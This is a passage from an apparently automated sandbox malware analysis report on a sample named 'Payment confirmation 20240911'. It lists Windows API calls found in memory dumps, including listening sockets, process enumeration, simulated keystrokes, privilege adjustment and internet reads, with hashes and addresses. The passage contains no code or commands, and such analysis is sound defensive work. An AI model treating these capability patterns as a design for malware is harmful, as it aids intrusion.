                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: c8e56fb30b331c676b7f4a4717e368a43f6e6bb57cb82166532c49bedf8f5460
                                          • Instruction ID: b963679ac663c365f6e9e2e9375dd5b9372b5bb76a7dc5d1dfcd8f7cea072698
                                          • Opcode Fuzzy Hash: c8e56fb30b331c676b7f4a4717e368a43f6e6bb57cb82166532c49bedf8f5460
                                          • Instruction Fuzzy Hash: 8301A776744335ABF768367C8C4ABBB7A9C9B0479CF0444A4EB53D51E5D6609C0181A4
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01339235
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339244
                                          • bind.WSOCK32(00000000,?,00000010), ref: 01339260
                                          • listen.WSOCK32(00000000,00000005), ref: 0133926F
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339289
                                          • closesocket.WSOCK32(00000000,00000000), ref: 0133929D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: f86d9555981e0d037086705aee6c582b0f066116047498ed627788d3ebb902f0
                                          • Instruction ID: 9c657bd415df34f38f1980ae31213a36ff4950782bd47fce6631a90373618d19
                                          • Opcode Fuzzy Hash: f86d9555981e0d037086705aee6c582b0f066116047498ed627788d3ebb902f0
                                          • Instruction Fuzzy Hash: 5B219135600619DFCB10EFA8C884B6EB7EDEF88328F108159E956E7390CB74AD41CB51
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01326F7D
                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 01326F8D
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 01326FAC
                                          • __wsplitpath.LIBCMT ref: 01326FD0
                                          • _wcscat.LIBCMT ref: 01326FE3
                                          • CloseHandle.KERNEL32(00000000), ref: 01327022
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                          • String ID:
                                          • API String ID: 1605983538-0
                                          • Opcode ID: 19d6a28da1f43d167e277030134895a6e58c632a8851eda344c368f26a6c74bb
                                          • Instruction ID: cd75efcb585982c97bf3a7815eb411f9ee4d944ef2de69dcf0c035f320d8fa49
                                          • Opcode Fuzzy Hash: 19d6a28da1f43d167e277030134895a6e58c632a8851eda344c368f26a6c74bb
                                          • Instruction Fuzzy Hash: C6219571900219ABDB21ABA4CC88BEEB7FCAB18704F1044A5E545D3141E7759B84CB60
                                          APIs
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                          • _memmove.LIBCMT ref: 01353020
                                          • _memmove.LIBCMT ref: 01353135
                                          • _memmove.LIBCMT ref: 013531DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID:
                                          • API String ID: 1300846289-0
                                          • Opcode ID: 7596acf1cc0005e54231c18a30c945f39a9b25c55658b1001a3894c521d2711b
                                          • Instruction ID: 9b680fae813ab9e2ef209380f310d9dacc6486f7009e808ca20379581a607aee
                                          • Opcode Fuzzy Hash: 7596acf1cc0005e54231c18a30c945f39a9b25c55658b1001a3894c521d2711b
                                          • Instruction Fuzzy Hash: C202AF70A1020ADBDF09DF68C985ABEBBF5FF44340F548069E806EB255EB31DA15CB91
                                          APIs
                                            • Part of subcall function 0133ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0133ACF5
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0133973D
                                          • WSAGetLastError.WSOCK32(00000000,00000000), ref: 01339760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLastinet_addrsocket
                                          • String ID:
                                          • API String ID: 4170576061-0
                                          • Opcode ID: 1cc88d791491d550d21e6f24f1b72d79c5b48dcb15d1ddcbc5b58d67a3041d7e
                                          • Instruction ID: fa62d1f80cfde7b995923fdef199ff45fa7e11d3cc4dcb9fc729ea8de41c40ed
                                          • Opcode Fuzzy Hash: 1cc88d791491d550d21e6f24f1b72d79c5b48dcb15d1ddcbc5b58d67a3041d7e
                                          • Instruction Fuzzy Hash: 9D41D070610205AFDB24AF68C884E7EB7EDEF84728F44805CFA56AB3D1DB749D018B91
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0132F37A
                                          • _wcscmp.LIBCMT ref: 0132F3AA
                                          • _wcscmp.LIBCMT ref: 0132F3BF
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0132F3D0
                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0132F3FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                          • String ID:
                                          • API String ID: 2387731787-0
                                          • Opcode ID: 2798fbe62060f30f1fa57db826797cdd5d204304a0777cf8493e64009ca42f3a
                                          • Instruction ID: 23df9463f37562e347d960f8380d021bd971ae95e7db7394b385f250878861bb
                                          • Opcode Fuzzy Hash: 2798fbe62060f30f1fa57db826797cdd5d204304a0777cf8493e64009ca42f3a
                                          • Instruction Fuzzy Hash: 4741AC356003029FC718EF68C490AA9B7F8FF49328F10416DEA5ACB3A1DB71E945CB91
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 01342104
                                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 01342116
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetProcessId$kernel32.dll
                                          • API String ID: 2574300362-399901964
                                          • Opcode ID: 6b6d31497453fb42a1d060092402f5413f5c77b859f909f60c48f5dd327c303d
                                          • Instruction ID: 3f29ca0ba1b42d747ce5bc4ccdaad2fd6a51bd4d05c41e524d182fcce7031cf4
                                          • Opcode Fuzzy Hash: 6b6d31497453fb42a1d060092402f5413f5c77b859f909f60c48f5dd327c303d
                                          • Instruction Fuzzy Hash: ECD05E38500712DBDB306BA6A4096133AD8AB08208F00841DE69BA1219D6F0D4808B10
                                          APIs
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                          • _memmove.LIBCMT ref: 012F2C63
                                          • _memmove.LIBCMT ref: 012F303A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID: @
                                          • API String ID: 1300846289-2766056989
                                          • Opcode ID: a3b3f5350059cc9275a52c7d50ed2ef4639838e351a45d0944669fb49fba2753
                                          • Instruction ID: 90640af29a2f3326026712b9f9d9bffb2ead4284b6f25f6ab31e22de9329744d
                                          • Opcode Fuzzy Hash: a3b3f5350059cc9275a52c7d50ed2ef4639838e351a45d0944669fb49fba2753
                                          • Instruction Fuzzy Hash: 47C29C74A2020ADFDB14DF98C484AAEFBB5FF49304F54806DEA06AB391D774E945CB90
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 0132439C
                                          • SetKeyboardState.USER32(00000080), ref: 013243B8
                                          • PostMessageW.USER32 ref: 01324425
                                          • SendInput.USER32(00000001,?,0000001C), ref: 01324483
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: c6432d1f86b76292b50effbf9addcda38805b51248e83a6b442489eb5d3f3c6b
                                          • Instruction ID: c7e7ee3ddd375b3c782a8cb804c9b02b953e4f0f8d47c0621f9a3562e124253a
                                          • Opcode Fuzzy Hash: c6432d1f86b76292b50effbf9addcda38805b51248e83a6b442489eb5d3f3c6b
                                          • Instruction Fuzzy Hash: 5C412A70A00268AAFF31AB69D8087FD7FB9AF49319F04011AE6C5A76C1C7788985C765
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0132715C
                                          • _memset.LIBCMT ref: 0132717D
                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 013271CF
                                          • CloseHandle.KERNEL32(00000000), ref: 013271D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                          • String ID:
                                          • API String ID: 1157408455-0
                                          • Opcode ID: f37038762435296dde5367be85f645665007104c68181ba6ee583e46506bf828
                                          • Instruction ID: 51094d6d2e8c94cc980ca838ed65b42583ca1b390ec19ee173db89bcae72fed9
                                          • Opcode Fuzzy Hash: f37038762435296dde5367be85f645665007104c68181ba6ee583e46506bf828
                                          • Instruction Fuzzy Hash: 9811CD719012287AD73067A5AC4DFDBBABCEF45764F104199F504E71D0D2745E808BA4
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0132221E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: 523efa8dd787eba415ec6671fc7f9a11e5b8c19f98196b2f26088a7b924ed44e
                                          • Instruction ID: c0a8dba1bd59834263e67794833e309b91ea07f7dfb218829c1ceccf6a436faa
                                          • Opcode Fuzzy Hash: 523efa8dd787eba415ec6671fc7f9a11e5b8c19f98196b2f26088a7b924ed44e
                                          • Instruction Fuzzy Hash: 3D323475A007159FCB28DF69C480A6AB7F0FF48324B11C46EE59ADB7A2E770E941CB44
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 012FAE5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LongProcWindow
                                          • String ID:
                                          • API String ID: 3265722593-0
                                          • Opcode ID: 76315bd0650d84e18d5e106fd6090c71400019fccc816f3bdad239cb7f538224
                                          • Instruction ID: 26679538df142dbdc30b4b3455a4c89504ed0f888fa627c54ab4416bb0c30358
                                          • Opcode Fuzzy Hash: 76315bd0650d84e18d5e106fd6090c71400019fccc816f3bdad239cb7f538224
                                          • Instruction Fuzzy Hash: AFA1D3A413420ABBEB28AE2D4C88D7FBD9DEF55B49F04463DFB0AD71D1CA559C018272
                                          APIs
                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 013355FD
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01335629
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: 26ceb284abd54a308021f739902831ad09f5d958d2ea544be53b056710248452
                                          • Instruction ID: 7efd51c4660a43e5bbfb6f9ffdb39c12baddf121ba689f26aece43e30ad2e774
                                          • Opcode Fuzzy Hash: 26ceb284abd54a308021f739902831ad09f5d958d2ea544be53b056710248452
                                          • Instruction Fuzzy Hash: D9419471600209FFFB119E99DC84EBFB7FDEB8076CF10405AF606A6180DA71AE419B58
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0132EB5B
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0132EBB5
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0132EC02
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: 10404bba9a82a6eb4df65d5a5fb2caf61e0795dc23ad18e7fce2a1d7598052bb
                                          • Instruction ID: 8e50c9eff155c3ee5645400f32b4198ae965424ee7db954514bd91e485bcce47
                                          • Opcode Fuzzy Hash: 10404bba9a82a6eb4df65d5a5fb2caf61e0795dc23ad18e7fce2a1d7598052bb
                                          • Instruction Fuzzy Hash: 87215C35A10218EFCB00EFA9D894AADFBB8FF59314F1480A9E946EB354DB31D905CB50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 7ba37678527445d63284da940d10b509a39e5584fa943d44281f856f49086ad2
                                          • Instruction ID: e00612fffe2f01039aa4214679f57f8f92cc921cbbc5321f0ae442ae011896a3
                                          • Opcode Fuzzy Hash: 7ba37678527445d63284da940d10b509a39e5584fa943d44281f856f49086ad2
                                          • Instruction Fuzzy Hash: DCA2BCB0E10219CFDB28CF58C8846ADBBF1FF58314F65816AE919AB395D7709981CF90
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0132FD71
                                          • FindClose.KERNEL32(00000000), ref: 0132FDA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: ab04b6d6b0cf80ed8539b593581ef568755f4be1f9d6138d281dbefb60576234
                                          • Instruction ID: 9bac621783a77df19aa8087e60475214f708336956fe3f5797042d01adab89df
                                          • Opcode Fuzzy Hash: ab04b6d6b0cf80ed8539b593581ef568755f4be1f9d6138d281dbefb60576234
                                          • Instruction Fuzzy Hash: 8711A1316102059FD710EF68D848A2AF7E8FF98324F00851EE9A9DB290DB74E8058B81
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0133C2E2,?,?,00000000,?), ref: 0132D73F
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0133C2E2,?,?,00000000,?), ref: 0132D751
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 8ffc81a60991750a578a514f82b3267593bca4fb031766780e542560cdba1388
                                          • Instruction ID: 19e8135ffa330a3247d1951d24a0093b1d7b2981db285725c9d4c8cd32b00ecb
                                          • Opcode Fuzzy Hash: 8ffc81a60991750a578a514f82b3267593bca4fb031766780e542560cdba1388
                                          • Instruction Fuzzy Hash: 40F08C3510032DABDB21AEE8CC48FEA77ACAF497A5F008115F989D6185D6309A80CBA0
                                          APIs
                                          • SendInput.USER32(00000001,?,0000001C), ref: 01324B89
                                          • keybd_event.USER32 ref: 01324B9C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InputSendkeybd_event
                                          • String ID:
                                          • API String ID: 3536248340-0
                                          • Opcode ID: 5b2e22e06a0efa6d4f218eb28be30ae26dc8db3edaec73ea76d7cdd1e02f0302
                                          • Instruction ID: 5434ed2a73805f6038e76c8f2893681c34b317f4e5c039be0a25874020145cbf
                                          • Opcode Fuzzy Hash: 5b2e22e06a0efa6d4f218eb28be30ae26dc8db3edaec73ea76d7cdd1e02f0302
                                          • Instruction Fuzzy Hash: DAF06D7090024DAFEB059FA5C805BBE7FB4AF00309F00C40AFA91A5191D37986159F94
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0131B9EC), ref: 0131B8C5
                                          • CloseHandle.KERNEL32(?), ref: 0131B8D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 60606e6ef253f04cfa7109555bf7a78f0211e3bae50f80dddde822b44a2ea61f
                                          • Instruction ID: fea5387b338d6d7e5084e4c654b18d3a809fbd9ce674ceafd372a19e149e9a3d
                                          • Opcode Fuzzy Hash: 60606e6ef253f04cfa7109555bf7a78f0211e3bae50f80dddde822b44a2ea61f
